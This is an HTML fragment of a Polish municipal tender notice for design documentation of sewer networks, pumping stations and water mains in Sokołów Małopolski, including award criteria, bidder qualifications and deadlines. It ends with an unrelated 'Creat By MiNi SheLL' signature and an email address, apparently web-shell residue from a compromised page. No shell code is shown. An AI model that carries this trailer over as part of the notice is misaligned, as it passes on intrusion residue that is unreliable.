class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 6.1. Opracowanie dokumentacji projektowej sieci kanalizacji sanitarnej grawitacyjnej na osiedlu Kwiatowym II wraz z wpięciem do przepompowni ścieków<br/>W ramach zadania 6.1. należy zaprojektować sieć kanalizacji sanitarnej grawitacyjnej na osiedlu Kwiatowym II w Sokołowie Małopolskim projekt powinien przewidzieć uzbrojenie wszystkich działek nieuzbrojonych w obrębie osiedla, z wpięciem do projektowanej przepompowni ścieków (w okolicy działki nr ewid. 289/4 w Sokołowie Małopolskim, projektowanej w zadaniu 6.3.). Proponowany przebieg sieci został przedstawiony na mapie – załącznik nr 2.6.1. do SWZ.<br/><br/>Zadanie 6.2. Opracowanie dokumentacji projektowej sieci kanalizacji sanitarnej grawitacyjnej na osiedlu Północ V <br/>W ramach zadania 6.2. należy zaprojektować sieć kanalizacji sanitarnej grawitacyjnej na osiedlu Północ V w Sokołowie Małopolskim. Projekt powinien uwzględniać uzbrojenie wszystkich nieuzbrojonych działek w obrębie osiedla i nie objętych innym innymi opracowaniami), z wpięciem istniejącej sieci kanalizacji sanitarnej. Proponowany przebieg sieci został przedstawiony na mapie – załącznik nr 2.6.2. do SWZ.<br/><br/>Zadanie 6.3. Opracowanie dokumentacji projektowej sieci kanalizacji sanitarnej grawitacyjnej i tłocznej na osiedlach Północ IV, Zachód I wraz z dwoma przepompowniami ścieków<br/>W ramach zadania 6.3. należy zaprojektować sieć kanalizacji sanitarnej grawitacyjnej na osiedlach Północ IV i Zachód I w Sokołowie Małopolskim. Projekt powinien uwzględniać uzbrojenie wszystkich nieuzbrojonych działek w obrębie osiedla. W ramach zadania należy zaprojektować dwie przepompownie ścieków (przybliżona lokalizacja przepompowni działka nr ewid. 289/4 oraz działka nr ewid. 332/5 w Sokołowie Małopolskim) oraz rurociągami tłocznymi, zgodnie z koncepcją zawartą w decyzji środowiskowej. Proponowany przebieg sieci został przedstawiony na mapie – załącznik nr 2.6.3. do SWZ.<br/><br/>Zadanie 6.4. Opracowanie dokumentacji projektowej sieci kanalizacji sanitarnej na części osiedla Za górką wraz z przepompownią ścieków<br/>W ramach zadania 6.4. należy zaprojektować sieć kanalizacji sanitarnej grawitacyjnej na części osiedla Za górką w Sokołowie Małopolskim (część zachodnia osiedla od drogi Wojewódzkiej nr 875). W ramach zadania należy zaprojektować przepompownie ścieków (przybliżona lokalizacja przepompowni działka nr ewid. 6165 w Sokołowie Małopolskim), zgodnie z koncepcją zawartą w decyzji środowiskowej. Proponowany przebieg sieci został przedstawiony na mapie – załącznik nr 2.6.4. do SWZ.<br/><br/>Zadanie 6.5. Opracowanie dokumentacji projektowej sieci wodociągowej na osiedlu Kwiatowym II<br/>W ramach Zadania nr 6.5. należy zaprojektować sieć wodociągową na osiedlu Kwiatowym II w Sokołowie Małopolskim. Projekt powinien uwzględnić uzbrojenie wszystkich działek nieuzbrojonych w obrębie osiedla. Proponowany przebieg sieci został przedstawiony na mapie – załącznik nr 2.6.5. do SWZ.<br/><br/>Zadanie 6.6. Opracowanie dokumentacji projektowej sieci wodociągowej na osiedlu Północ V <br/>W ramach Zadania nr 6.6. należy zaprojektować sieć wodociągową na osiedlu Północ V w Sokołowie Małopolskim. Projekt powinien uwzględnić uzbrojenie wszystkich działek nieuzbrojonych w obrębie osiedla. Proponowany przebieg sieci został przedstawiony na mapie – załącznik nr 2.6.6. do SWZ.<br/><br/>Zadanie 6.7. Opracowanie dokumentacji projektowej sieci wodociągowej na osiedlach Północ IV, Zachód I<br/>W ramach Zadania nr 6.7. należy zaprojektować sieć wodociągową na osiedlach Północ IV, Zachód I w Sokołowie Małopolskim. Projekt powinien uwzględnić uzbrojenie wszystkich działek nieuzbrojonych w obrębie osiedli. Proponowany przebieg sieci został przedstawiony na mapie – załącznik nr 2.6.7. do SWZ.<br/><br/><br/>Zadanie 6.8. Opracowanie dokumentacji projektowej sieci wodociągowej na części osiedla Za górką<br/>W ramach Zadania nr 6.8. należy zaprojektować sieć wodociągową na części osiedla Za górką w Sokołowie Małopolskim (część zachodnia osiedla od drogi Wojewódzkiej nr 875). Proponowany przebieg sieci został przedstawiony na mapie – załącznik nr 2.6.8. do SWZ.<br/><br/>Projekt sieci kanalizacyjnej z zadań 6.1., 6.2., 6.3. i 6.4. powinien być zgodny z wymogami decyzji środowiskowej nr RG.6220.4.2022 z dnia XXX – załącznik nr 3.6.1. do SWZ oraz koncepcją przedstawioną na załącznikach nr 3.6.2.1., 3.6.2.2., 3.6.2.3., 3.6.2.4. do SWZ<br/>1. Opracowanie kompletnej dokumentacji projektowej zgodnie z wymogami obowiązującego prawa:<br/>1.1. Opracowanie Projektu budowlanego i zagospodarowania terenu inwestycji, w tym:<br/>- Opracowanie koncepcji i uzgodnienie jej z Zamawiającym i właścicielami posesji prywatnych.<br/>- Uzyskanie niezbędnych zgód i warunków realizacji inwestycji od operatorów sieci kolidujących oraz od operatora sieci<br/>wodociągowej.<br/>- Uzyskanie zgód na wejście w teren.<br/>- Pozyskanie wypisów z MPZP, wypisów z rejestru gruntów lub innych wymaganych dokumentów.<br/>- Przygotowanie materiałów i załączników do kompletnego wniosku o uzyskanie decyzji pozwolenia wodnoprawnego lub<br/>zgłoszenia wodnoprawnego (jeżeli będzie wymagane);<br/>- Pozyskanie map do celów projektowych, na koszt Wykonawcy, w zakresie niezbędnym do opracowania dokumentacji<br/>budowlanej.<br/>- Opracowanie projektu zagospodarowania i uzgodnienie go w ramach narady ZUDP.<br/>- Uzgodnienia przeciwpożarowe – jeżeli będą wymagane przepisami prawa.<br/>- Ew. uzgodnień w zakresie melioracji.<br/>- Przygotowanie dokumentacji geologicznej, określającej warunki gruntowe oraz wodne realizacji inwestycji (jeżeli będzie<br/>wymagana).<br/>- Opracowane kompletnego projektu budowlanego (PZT), wraz z niezbędnymi opisami i załącznikami, zgodnie z wymogami<br/>prawa budowlanego, który pozwoli na skuteczne uzyskanie pozwolenia na budowę lub zgłoszenia budowy.<br/>- Przygotowywanie wszelkich wniosków o uzyskanie zgód/decyzji administracyjnych na każdym z etapów prac projektowych<br/>oraz przygotowanie wniosków o wydanie decyzji o pozwolenie na budowę lub zgłoszenia robót budowlanych do podpisu<br/>przez Zamawiającego tj. Burmistrza Gminy Sokołów Małopolski lub osób upoważnionych przez Burmistrza Gminy Sokołów<br/>Małopolski wraz z niezbędną ilością egz. wymaganą przez dany Organ/Urząd/Instytucję wraz z wymaganymi załącznikami<br/>w ilości innej wg wymagań Organu, w tym 1 egz. dla Zamawiającego;<br/>- Uzyskanie prawomocnych decyzji administracyjnych lub uzyskanie braku sprzeciwu właściwych Organów na realizację<br/>danego zakresu inwestycji.<br/>1.2. Opracowanie Projektu technicznego, na etapie przed uzyskaniem pozwolenia na budowę, w tym:<br/>- Opracowanie wszelkich niezbędnych dodatkowych projektów, w tym narzuconych przez użytkowników i administratorów<br/>infrastruktury nadziemnej i podziemnej np. projekt zabezpieczenia czy przebudowy istniejącego uzbrojenia, doprowadzenia<br/>wymaganych sieci/budowa przyłączy do obiektów liniowych, przejścia przez drogę, lokalizacji infrastruktury w pasie<br/>drogowym itp.:<br/>• Dokonanie niezbędnych uzgodnień i uwzględnienie ich przy projektowaniu i ewentualnym zabezpieczeniu lub<br/>przeprojektowaniu urządzeń podziemnych,<br/>• Uzyskanie wszystkich opinii i uzgodnień wymaganych obowiązującymi przepisami;<br/>• Opracowanie projektu odtworzenia nawierzchni (jeżeli dotyczy);<br/>• Opracowanie STWiOR;<br/>• Opracowanie przedmiaru robót;<br/>• Opracowanie kosztorysu inwestorskiego;<br/>• Sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia;<br/>1.3. Projekty winny być zaopatrzone w wykaz opracowań oraz w pisemne oświadczenie Wykonawcy, że został sporządzony<br/>zgodnie z postanowieniami umowy, powszechnie obowiązującymi w tym zakresie przepisami prawa oraz, że jest w stanie<br/>kompletnym z punktu widzenia celu, jakiemu ma służyć i nadaje się do realizacji. Wykaz opracowań oraz pisemne<br/>oświadczenie, o których mowa wyżej stanowią integralną część Projektu oraz część przedmiotu odbioru końcowego<br/>zadania. Projekt nie może zawierać niczego, co naruszałoby jakiekolwiek prawa osób trzecich w tym prawa na dobrach<br/>niematerialnych osób trzecich.<br/>1.4. Dokumenty o których mowa w pkt. 1.2 i 1.3 winny być przygotowane w wersji papierowej w 4 egz., oraz w wersji<br/>elektronicznej w 1 egz., na nośniku pendrive, dostępne w plikach pdf . Wymaga się aby projekt budowlany w wersji<br/>elektronicznej obejmował wersję ostateczną zatwierdzoną przez Starostwo (z pieczęciami Starostwa)<br/>1.5. STWiOR, przedmiary robót oraz kosztorysy inwestorskie winny być przygotowane w wersji papierowej w 2 egz. oraz w<br/>wersji elektronicznej w 1 egz., na nośniku pendrive, wymaga się, aby kosztorys inwestorski i przedmiar robót były<br/>przygotowane w pliku programu kosztorysowego oraz w wersjach pdf i excel. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71322200-3 - Usługi projektowania rurociągów</p> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">105 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryterium oceny ofert:<br/>Cena - 100% = 100 pkt<br/>Kryterium – cena (C): oferty będą oceniane według poniższego wzoru:<br/>C=(Najniższa całkowita wartość brutto spośród oferty)/(Całkowita wartość brutto badanej oferty) x 100 x 100 %= ...pkt<br/>Najkorzystniejsza oferta w kryterium cena, wg wzoru może uzyskać maksymalnie 100 punktów. Przyznane ilości punktów zostaną zaokrąglone do 2 miejsc po przecinku.<br/>Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma najwyższą liczę punktów.<br/>Maksymalna łączna liczba punktów jaką możne uzyskać Wykonawca wynosi – 100 pkt.<br/>Zamawiający stosuje zaokrąglenie wyników do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>- zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że: dysponuje lub będzie dysponował podczas realizacji zamówienia: co najmniej 1 osobą, która zostanie skierowana do realizacji przedmiotu zamówienia, posiadającą uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji, urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych, kanalizacyjnych bez ograniczeń. W przypadku Wykonawców zagranicznych dopuszcza się kwalifikacje równoważne do wymaganych zdobyte w innych państwach, uznane w myśl art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane wraz z aktualnym zaświadczeniem o członkostwie w okręgowej Izbie inżynierów Budownictwa bądź uprawnieniami z Unii Europejskiej (lub odpowiadające im ważne uprawnienia wydane na podstawie obowiązujących wcześniej przepisów). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>1)	Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U. 2024 poz. 1616), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 5 do SWZ;<br/>2)	Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>3)	Zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio prze upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków i opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności .<br/>4)	Wykaz osób, spełniających wymagania określone w rozdz. VIII ust. 2 pkt 4 skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie wykonywaniem, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – załącznik nr 7 do SWZ;<br/>5)	Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.125 ust.1 P.z.p. – załącznik nr 9 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni Wykonawcy – załącznik nr 11 do SWZ.<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 P.z.p. oraz wskazanym w projektowanych postanowieniach umowy w sprawie zamówienia publicznego - paragraf 9 projektu umowy stanowiący załącznik nr 8 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-20 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem platformy e-Zamówienia pod adresem: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-20 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com